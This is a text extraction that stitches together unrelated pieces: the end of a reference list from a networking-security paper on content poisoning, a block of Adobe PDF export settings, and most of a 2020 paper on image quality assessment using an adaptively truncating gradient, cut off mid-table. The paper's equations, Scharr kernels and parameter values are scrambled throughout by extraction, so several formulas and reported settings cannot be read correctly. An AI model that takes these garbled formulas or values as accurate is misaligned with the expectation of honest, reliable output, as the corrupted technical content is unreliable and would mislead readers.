J, Yeom I. 2015. Efficient content verification in named data networking. In: Proceedings of the 2nd ACM Conference on Information-Centric Networking, ACM-ICN ’15. New York: Association for Computing Machinery, 109–116. Kumar N, Singh AK, Aleem A, Srivastava S. 2019. Security attacks in named data networking: a review and research directions. Journal of Computer Science and Technology 34(6):1319–1350 DOI 10.1007/s11390-019-1978-9. Nam S, Kim D, Yeom I. 2015. Content verification in named data networking. In: 2015 International Conference on Information Networking (ICOIN). 414–415. Nguyen T, Marchal X, Doyen G, Cholez T, Cogranne R. 2017. Content poisoning in named data networking: comprehensive characterization of real deployment. In: 2017 IFIP/IEEE Symposium on Integrated Network and Service Management (IM). Piscataway: IEEE, 72–80. Qureshi AM, Anjum N. 2020. Detection of malicious consumer interest packet while mitigating content poisoning attack with name-key based forwarding and multipath forwarding based inband probe. In: 2020 International Conference on UK-China Emerging Technologies (UCET). Glasgow: University of Glasgow, 1–4. Ribeiro I, Rocha A, Albuquerque C, Guimarães F. 2016. Content pollution mitigation for content-centric networking. In: 2016 7th International Conference on the Network of the Future (NOF), 16–18 November 2016, Búzios, Rio de Janeiro, Brazil. 1–5. Spring N, Mahajan R, Wetherall D, Anderson T. 2004. Measuring ISP topologies with rocketfuel. IEEE/ACM Transactions on Networking 12(1):2–16 DOI 10.1109/TNET.2003.822655. Tarkoma S, Ain M, Visala K. 2009. The publish/subscribe internet routing paradigm (PSIRP): designing the future internet architecture. In: Tselentis G, ed. Towards the Future Internet. Amsterdam: IOS Press, 102–111. Tourani R, Misra S, Mick T, Panwar G. 2018. Security, privacy, and access control in information-centric networking: a survey. IEEE Communications Surveys Tutorials 20(1):566–600 DOI 10.1109/COMST.2017.2749508. Ullah SS, Ullah I, Khattak H, Khan MA, Adnan M, Hussain S, Amin NU, Khattak MAK. 2020. A lightweight identity-based signature scheme for mitigation of content poisoning attack in named data networking with internet of things. IEEE Access 8:98910–98928 DOI 10.1109/ACCESS.2020.2995080. Wang Y, Qi Z, Lei K, Liu B, Tian C. 2017. Preventing bad content dispersal in named data networking. In: Proceedings of the ACM Turing 50th Celebration Conference - China, ACM TUR-C ’17. New York: Association for Computing Machinery. Wein JM, Kloninger JJ, Nottingham MC, Karger DR, Lisiecki PA. 2007. Content delivery network (CDN) content server request handling mechanism with metadata framework support. US Patent 7,240,100. Available at https://patents.google.com/patent/US7240100B1/en. Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 23/24 http://dx.doi.org/10.1109/TIFS.2017.2725229 http://dx.doi.org/10.1007/s11390-019-1978-9 http://dx.doi.org/10.1109/TNET.2003.822655 http://dx.doi.org/10.1109/COMST.2017.2749508 http://dx.doi.org/10.1109/ACCESS.2020.2995080 https://patents.google.com/patent/US7240100B1/en http://dx.doi.org/10.7717/peerj-cs.435 https://peerj.com/computer-science/ Wu D, Xu Z, Chen B, Zhang Y. 2016. What if routers are malicious? Mitigating content poisoning attack in NDN. In: IEEE Trustcom/BigDataSE/ISPA, 23–26 August 2016, Tianjin, China. Piscataway: IEEE, 481–488. Yue P, Li R, Pang B. 2019. Register before publishing with smart forwarding, mitigate content poisoning attack in ICN. In: IEEE International Conference on Parallel Distributed Processing with Applications, Big Data Cloud Computing, Sustainable Computing Communications, Social Computing Networking. Piscataway: IEEE, 210–217. Zhang Z, Yu Y, Zhang H, Newberry E, Mastorakis S, Li Y, Afanasyev A, Zhang L. 2018. An overview of security support in named data networking. IEEE Communications Magazine 56(11):62–68. Qureshi et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.435 24/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.435 Detection of malicious consumer interest packet with dynamic threshold values Introduction Related work Proposed approach Experimental results Conclusion and future direction References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_mukxqnihnrepzo7h2b4dlvnabe ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-034 27 Adaptively Truncating Gradient for Image Quality Assessment Minjuan Gao School of Electrical and Control Engineering Shaanxi University of Science & Technology Xi’an, China E-mail: gaominjuan1984@163.com Hongshe Dang School of Electrical and Control Engineering Shaanxi University of Science & Technology Xi’an, China E-mail: 783940896@qq.com Xuande Zhang School of Electronic Information and Artifificial Intelligence Shaanxi University of Science & Technology Xi’an, China E-mail: 330374142@qq.com Abstract—Objective image quality assessment (IQA) aims to develop computational models to predict the perceptual image quality consistent with subjective evaluations. As image information is presented by the change in intensity values in the spatial domain, the gradient, as a basic tool for measuring the change, is widely used in IQA models. However, does the change measured by the gradient actually correspond to the change perceived by the human visual system (HVS)? To explore this issue, in this paper, we analyze how the ability of the HVS to perceive changes is affected by the upper threshold, and we propose an IQA index based on an adaptively truncating gradient. Specifically, the upper threshold at each pixel in an image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. Then, the distorted image quality is calculated by comparing the similarity of the adaptively truncating gradient between a reference image and the distorted image. Experimental results on six benchmark databases demonstrate that the proposed index correlates well with human evaluations. Keywords-Image Quality Assessment; Human Visual System; Upper Threshold; Truncating Gradient I. INTRODUCTION Image quality assessment deals with the quantitative evaluation of the quality of images and can be widely used in image acquisition, compression, storage, transmission and other image processing systems. Generally, human beings are the ultimate receivers of images. Subjective evaluation by humans is a reliable IQA method, but it is cumbersome and difficult to apply in real-world scenarios. An objective IQA method aims to design mathematical models to automatically measure the image quality in a way that is consistent with human evaluations. According to the availability of ground-truth images, objective IQA indices fall into three categories: full-reference (FR), reduced-reference (RR) and no-reference (NR) models [1]. In this paper, the discussion is focused on FR models. At present, there are two popular techniques for constructing FR models: knowledge-based and learning-based techniques. The deep learning method learns the evaluation model in an end-to-end manner, and its "black-box" lacks explanation. Furthermore, this approach requires a large number of training samples, but the cost of obtaining high-quality and mailto:783940896@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 28 convincing samples is relatively high. Currently, the commonly used method for obtaining samples is still data augmentation. In this work, we emphasize the knowledge-based approach, which uses knowledge about the HVS to heuristically construct IQA models. Investigating these models reveals that the gradient feature is widely employed. In analyzing the relationship between the gradient feature and the IQA task, the gradient has at least the following two characteristics. 1. The information contained in natural images is presented by changes in intensity value or color in the spatial domain. In extreme cases, the constant image (smoothness) and the pure noise image (variation in all directions) cannot convey any information. Thus, the feature of measuring change is widely used in IQA, with the gradient as the basic tool for measuring change. 2. The judgment of the image quality level in IQA is different from the classic discrimination task. The features for discrimination tasks, such as face recognition and fingerprint recognition, should be robust to image distortion, while the features for IQA should be sensitive to image distortion. The gradient feature is sensitive to image distortion and image content but is weak in robustness. Representative FR models using the gradient feature include the feature similarity index (FSIM) [2], gradient magnitude similarity deviation index (GMSD) [3], superpixel-based similarity index (SPSIM) [4] and directional anisotropic structure metric (DASM) [5]. In the FSIM and GMSD, the image gradient magnitude is employed as the fundamental feature. SPSIM is computed on the basis of three features: superpixel luminance, superpixel chrominance and pixel gradient. The DASM is obtained by incorporating the gradient magnitude, anisotropy and local directivity features. Objective IQA models are designed by simulating the behaviors of the HVS, which integrates perception, understanding and assessing functions, that is, humans evaluate the image quality in the HVS perception space. Therefore, the features for IQA should be the subjective quantity perceived by the HVS. The gradient is often directly used in IQA models as an effective feature to measure change; however, does the change measured by the gradient actually correspond to that perceived by the HVS? In fact, the change measured by the gradient belongs to the objective quantity (objective physical stimulus), while that perceived by the HVS belongs to the subjective quantity (subjective response). Thus, how can one map the objective quantity to the subjective quantity? This mapping function is nonlinear, and it is difficult to accurately describe its form. Empirically, the ability of the human perception system to sense changes has a certain upper threshold. When the objective change exceeds the upper threshold, the subjective change increases insignificantly in situations such as the human perception of changes in salt- solution saltiness, at an outside temperature, and in the weight of objects carried. In this paper, we discuss the ability of the HVS to perceive changes affected by the upper threshold by employing the adaptively truncating gradient to measure the change perceived by the HVS. We propose an IQA index based on the adaptively truncating gradient. Specifically, the upper threshold at each pixel in the image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. Experimental results on public databases show that the proposed index correlates well with the subjective judgments. II. AN IQA INDEX BASED ON ADAPTIVELY TRUNCATING GRADIENT A. Definition of Adaptively Truncating Gradient The image information is presented by the change in the intensity values in the spatial domain, and this change may be destroyed by degradation of the image quality. The gradient feature can effectively measure the change and is widely used in IQA algorithms. The image gradient can be obtained by convolving the image with a gradient operator, such as Sobel, Roberts and Scharr and Prewitt. Usually, a different gradient operator for the IQA model may yield distinguished performance. This problem was discussed in [2,6], where the experiment results showed that the Scharr operator can obtain a slightly better performance than the others. Here, we adopt a 3×3 Scharr operator whose templates along the horizontal (H) and vertical (V) directions take the following form:               303 10010 303 16 1 Hh ，             3103 000 3103 16 1 Vh Denote  Ni rrr ,,,,r 1 for a reference image and  Ni ddd ,,,,d 1 for a distorted image, where i is the pixel index, and N is the number of total pixels. The image gradients in the horizontal and vertical directions can be obtained by convolution of the image with Hh and Vh , and the gradient magnitude is International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 29 computed from their root mean square. The gradient magnitudes of r and d at each pixel i , denoted as  iG ,r and  iG ,d , are calculated as          iiiG VH 22 hrhr,r  (1)          iiiG VH 22 hdhd,d  (2) Where the symbol  denotes the convolution operation. The image gradient only reflects the objective changes in images. Since human evaluation of image quality is carried out in the HVS perception space, the image features extracted for IQA models should reflect the subjective changes perceived by the HVS. We consider that the ability of HVS to perceive changes is subject to the upper threshold. When the objective change exceeds the upper threshold, the subjective change does not obviously increase. In this study, we define the adaptively truncating gradient to measure the subjective change sensed by the HVS. Denote T as the upper threshold. We define a truncating function )(trunc . For any given variable x , it is retained when it is less than T and truncated when it is greater than T . The specific expression is         Txx TxT xtrunc if if , , (3) The truncating gradients of r and d at each pixel i are denoted as  iGT ,r and  iGT ,d , and the upper threshold at this point is denoted as  iT . Using formula (3), the calculation of  iGT ,r is as follows:                       iTiGiG iTiGiT iGtrunciGT ,r,,r ,r, ,r,r if if (4) In Eq. (4), if the value of  iG ,r is greater than  iT , then  iG ,r will be truncated, and the truncating gradient  iGT ,r is set to  iT . That is, the part of the gradient magnitude that is greater than the upper threshold is masked. Otherwise,  iG ,r is not be masked, and the truncating gradient  iGT ,r is set equal to  iG ,r . That is, the part of the gradient magnitude that is less than the upper threshold can be perceived by the HVS. Similarly, using formula (3),  iGT ,d is calculated as follows:                       iTiGiG iTiGiT iGtrunciGT ,d,,d ,d, ,d,d if if (5) Obviously, for the calculation of the truncating gradients  iGT ,r and  iGT ,d in Eq. (4) and (5), the selection of the upper threshold  iT is very important. According to Weber’s law, the ratio of the stimulus change that causes a just noticeable difference (JND) from the original stimulus intensity is a constant. In psychology, the HVS has the property of light adaptation, and the perception of luminance obeys Weber’s law [7]. The just noticeable incremental luminance over the background by the HVS is related to the background luminance. Inspired by this recognition, in contrast to Weber’s law, we consider that the upper threshold for truncating the significantly perceptible stimulus change is also related to the original stimulus intensity value. Because different pixels in the image correspond to different gray values, the original stimulus intensity values will also be different. Here, we adaptively determine the upper threshold according to the background luminance of different areas of the image. The adaptively upper threshold is defined as     0T iI iT  (6) Where 0T is an adjustable threshold parameter. (The details of selecting 0 T will be presented in section Ⅲ- A.)  iI takes the larger value of the luminance of r and d at point i.       idirm axiI , (7) In formula (7), the luminance values  ir and  id at pixel i of r and d is estimated by formulas (8) and (9). For reference image r , denote the square neighborhood as r iΩ with center of pixel i and radius International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 30 of t , and let the intensity value of any pixel in the neighborhood be ji r , , r ij Ω . Similarly, for the distorted image, denote the square neighborhood as d iΩ with center of pixel i and radius of t , and let the intensity value of any pixel in the neighborhood be jid , , d ij Ω .      m j jir m ir 1 1 , (8)      m j jid m id 1 1 , (9) Where  212  tm . Based on Eq. (6), the value of the upper threshold at each pixel in an image can be adaptively determined according to the image content. Then, the adaptively truncating gradient is obtained by formulas (4) and (5). Figure 1 shows the gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. It can be seen that the maximum amplitude of the gradient map is approximately 250, while the maximum amplitude of the adaptively truncating gradient is approximately 70. (a) (b) (c) (d) (e) (f) Figure 1. The gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. (a) the reference image. (b) the distorted image. (c) and (d) are the gradient map of (a) and (b) , respectively. (e) and (f) are the adaptively truncating gradient map of (a) and (b) , respectively. B. The Proposed IQA Index With the adaptively truncating gradient defined, the local quality of the distorted image is predicted by the similarity between the adaptively truncating gradient of r and d, which is defined as           CiGiG CiGiG iS TT TT    ,d,r ,d,r 22 2 (10) Where the parameter C is introduced to avoid the denominator becoming zero and supplies numerical stability. The range of  iS is from 0 to 1. Obviously, on the one hand,  iS is close to 0 when  iGT ,r and  iGT ,d are quite different. On the other hand,  iS will achieve the maximal value 1 when  iGT ,r is equal to  iGT ,d . The overall quality score of the distorted image is predicted by the local quality  iS , which is calculated as follows :     N i iS N score 1 1 (11) A higher score indicates better image quality. III. EXPERIMENTAL RESULTS A. Experimental Setup All the experiments in this study were implemented in MATLAB R2016b and executed on a Lenovo Ideapad700 laptop with Intel Core i5-6300HQ@2.3- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 31 GHz CPU and 4 GB RAM. Several well-known FR metrics were used when comparing performances with the proposed method, including PSNR, SSIM[1], FSIM [2], GMSD[3], DASM[5], IFC [8], VIF [9], MS-SSIM [10], and SSRM [11]. To widely evaluate the performance of these metrics, six public databases were employed for the experiments: TID2013 [12], TID2008 [13], CSIQ [14], LIVE [15], IVC [16] and A57 [17]. The TID2008 database consists of 25 reference images and a total of 1700 distorted images, each of which is distorted using 17 different types of distortions at four different levels of distortion. The TID2013 is an expanded version of TID2008, which contains 3000 distorted images with 24 distortion types. The LIVE database includes 29 reference images and 779 distorted images with five distortion types. The CSIQ database contains 30 original images and 886 distorted images degraded by six types of distortion. The IVC database consists of 10 reference images and 185 distorted images. The A57 database includes 3 reference images and 54 distorted images. Note that for the color images in these databases, only the luminance component is evaluated. Four commonly used performance criteria are employed to evaluate the competing IQA metrics. The Spearman rank order correlation coefficient (SROCC) and Kendall rank order correlation coefficient (KROCC) are adopted for measuring the prediction monotonicity of an objective IQA metric. For compute the other two criteria, the Pearson linear correlation coefficient (PLCC) and the root mean squared error (RMSE), we need to apply a regression analysis. The PLCC measures the consistency between the objective scores after nonlinear regression and the subjective mean opinion scores (MOS). The RMSE measures the relative distance between the objective scores after nonlinear regression and MOS. For the nonlinear regression, we used the following mapping function:   541 321 1 2 1 βQβ e βQ βQβP          (12) where Q and PQ are original objective scores of an IQA metric and the objective scores after regression, respectively. iβ , 5,2,1, i are the fixed parameters. Higher values of SROCC, KROCC, PLCC and lower RMSE values indicate a better performance of IQA metrics. For the proposed metric, there are three parameters that need to be set to obtain the final quality score. They are 0T , t and C . Selecting the first 8 reference images and corresponding 544 distorted images in the TID2008 database as the testing subset, we choose the parameters that can yield the highest SROCC. The result is 30 T , 51t and 1600C . To further analyze the effect of threshold parameter 0T , more experiments were carried out. Figure 2 shows the SROCC performance with different 0T values on six databases. On most databases, SROCC can is best when 0T is 3. This result indicates that the range of upper threshold T is approximately [0,255/3] for an 8- bit grayscale image according to formula (6). If the change in image intensity is above 255/3, then it will be masked in visual perception. Figure 2. SROCC performance with different 0 T values on six databases B. Performance Comparison Table Ⅰ lists the SROCC, KROCC, PLCC and RMSE results of ten metrics on six databases, and the two best results of each row are highlighted in bold. Overall, the methods which employed the gradient feature performs well across all the databases, such as FSIM, GMSD, DASM and the proposed metric. This partly demonstrates the validity of considering the degradation of gray changes in quality evaluation. Furthermore, the proposed metric performs well, outperforming SSIM and SSRM and competing with FSIM and GMSD. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 32 TABLE I. COMPARISON THE PERFORMANCE RESULTS OF TEN IQA METRICS ON SIX PUBLIC DATABASES. THE FIRST TWO ARE MARKED IN BOLD Database criteria PSNR SSIM (2004) MS-SSIM (2003) IFC (2005) VIF (2006) FSIM (2011) GMSD (2014) DASM (2017) SSRM (2018) Proposed TID2013 SROCC 0.6396 0.7417 0.7859 0.5389 0.6769 0.8015 0.8038 0.8025 0.7500 0.8105 KROCC 0.4698 0.5588 0.6047 0.3939 0.5147 0.6289 0.6334 0.6321 0.5718 0.6387 PLCC 